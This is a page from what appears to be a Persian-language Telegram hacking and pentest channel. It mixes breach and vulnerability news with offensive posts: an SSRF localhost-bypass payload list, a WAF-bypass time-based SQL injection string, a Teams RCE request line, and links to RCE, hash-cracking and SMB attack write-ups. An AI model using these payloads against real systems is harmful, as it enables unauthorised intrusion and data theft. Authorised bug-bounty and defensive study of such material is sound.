امنیت اطلاعات
850 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
استفاده غیرامن از تابع unserialize در فریمورک zend منجر به RCE میشود

https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38

#php
#poi
#rce

@sec_nerd
رتبه بندی ده زبان برتر برنامه نویسی که توسعه دهندگان علاقه بیشتری به آنها داشته اند در سال ۲۰۲۰

1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript

https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved

#dev


@sec_nerd
نتایج اسکن کل اینترنت برای پورت ۴۴۳ که توسط یک فرد نیکوکار انجام شده

https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs


#scan
#enum


@sec_nerd
SSRF Bypass list for localhost (127.0.0.1):

https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01
https://⑯⑨。②⑤④。⑯⑨。②⑤④/
https://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
https://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
https://②⑧⑤②⓪③⑨①⑥⑥:80/
https://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
https://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
https://0xd8.0x3a.0xd6.0xe3
https://0xd83ad6e3
https://0xd8.0x3ad6e3
https://0xd8.0x3a.0xd6e3
https://0330.072.0326.0343
https://000330.0000072.0000326.00000343
https://033016553343
https://3627734755
https://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
https://216.0x3a.00000000326.0xe3
localtest.iss.one
https://newyork.localtest.iss.one
https://mysite.localtest.iss.one
https://redirecttest.localtest.iss.one
sub1.sub2.sub3.localtest.iss.one
https://bugbounty.dod.network
https://spoofed.burpcollaborator.net


#ssrf
#bugbounty
#pentest


@sec_nerd
۹ گام برای کرک کردن هش های ntlmv2 که از اسنیف با ابزار وایرشارک بدست آمده اند

https://research.801labs.org/cracking-an-ntlmv2-hash/


#windows
#privesc
#network
#enum


@sec_nerd
ما شیشه ی عطریم، بگوئید به سنگ...
Akamai WAF Bypass & SQLi

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'


#pentest
#bugbounty

@sec_nerd
التماس اسراییلی ها به هکرهای شرکت shirbit برای عدم انتشار دیتای هک شده

این هکرها از shirbit مبلغ ۵۰ بیت کوین درخواست کرده اند


#shirbit
#israel
#breach


@sec_nerd
اطلاعات ۲۴۳ میلیون برزیلی در اثر اشتباه برنامه نویسان در اختیار هکرها قرار گرفت.

اطلاعات شهروندان از دیتابیسی بدست آمده است که برنامه نویسان یوزرنیم و پسورد اتصال به آن را در سورس کد وبسایت دولتی جا گذاشته بودند.
این سورس کد به مدت ۶ ماه در دسترس بوده است.

https://www.zdnet.com/article/data-of-243-million-brazilians-exposed-online-via-website-source-code/


#breach
#brazil


@sec_nerd
حملات ترکیبی در شبکه های ویندوزی با بکارگیری شل های متاسپلویت و جمع آوری هش ها


https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/


#smb
#windows
#lateral_movement
#privesc
#msf


@sec_nerd
104 دستگاه پزشکی شرکت جنرال الکتریک دارای اکانت های مخفی و پسوردهای دیفالت هستند.
این دستگاه ها شامل ام آر آی، سی تی اسکن ، ایکس ری و ... هستند که نام کاربری و پسوردهای یکسان دارند به هکرها اجازه میدهند به راحتی عملیات نفوذ خود را به انجام برسانند.

گزارش و لیست سرویس های آسیب پذیر:
https://www.cybermdx.com/vulnerability-research-disclosures/ge-radiology-modalities


#news
#vuln


@sec_nerd
احتمالا گروه هکرهای روس APT28 مسئول نفوذ به ایمیل های پارلمان نروژ هستند.
این حمله که با بروت فورس کردن تعدادی از حساب های ایمیل پارلمان نروژ انجام شده با گمانه زنی های پلیس نروژ به گروه APT28 نسبت داده شده و گفته میشود این عملیات بخشی از عملیات گسترده تری ست که از سال ۲۰۱۹ آغاز شده است.
پسوردهای ضعیف باعث موفقیت این حمله شده.
هکرهای APT28 یا fancy bear به واحد اطلاعات ارتش روسیه (GRU) مرتبط است.


#russia
#apt28
#news


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
آسیب پذیری RCE در microsoft teams

PUT /v1/users/ME/conversations/19%3A9bc6400d2fc7443487491898c6803e46%40thread.tacv2/messages/1598607494949 HTTP/1.1


#microsoft
#rce


@sec_nerd